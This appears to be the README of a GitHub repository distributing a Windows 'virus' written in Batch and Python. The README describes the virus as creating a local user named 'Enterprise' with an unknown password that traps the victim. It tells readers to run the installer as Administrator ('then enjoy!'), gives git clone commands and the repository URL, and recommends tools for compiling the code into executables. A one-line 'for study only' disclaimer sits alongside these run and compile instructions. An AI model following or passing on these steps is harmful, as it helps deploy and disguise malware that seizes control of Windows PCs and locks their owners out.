A free and an open-source virus written in Batch or Python that infects Windows PCs, It was written in Batch first, then right now it is converted into a working Python code.
Just clone/download this repository contents as a .zip file (ensure all files are in one directory), then right click on the file named azur-lane-virus-installer-source-code.official.bat
then select "Run as Administrator" and click "Yes" if prompted, then enjoy!.
I'm just too lazy to compile this into an executable, I can't remember how did I compile it + I switched to python a long ago so i no longer work on batch files anymore.
In the main
branch.
This program is not intended to be used for any illegal purpose, You are supposed to use it in accordings to the law,
I just posted it here so you can study the source code not to mess with it and to misuse the project.
To get the source code of this project in your computer's Hard drive, you must have git installed, if you already have it installed, execute the following commands :
mkdir working-dir
cd working-dir
git clone https://github.com/insertx2k/alvirus
This virus creates a new user named "Enterprise" in your local SYSTEM, If you want to escape from the virus you should guess the password of it.
How do I compile this into a working exe file?:
Use either pyinstaller
or py2exe
, but I strongly recommend pyinstaller
for many reasons.
For batch versions of this source code, use a tool named Bat To Exe Converter by Fatih Kodak
.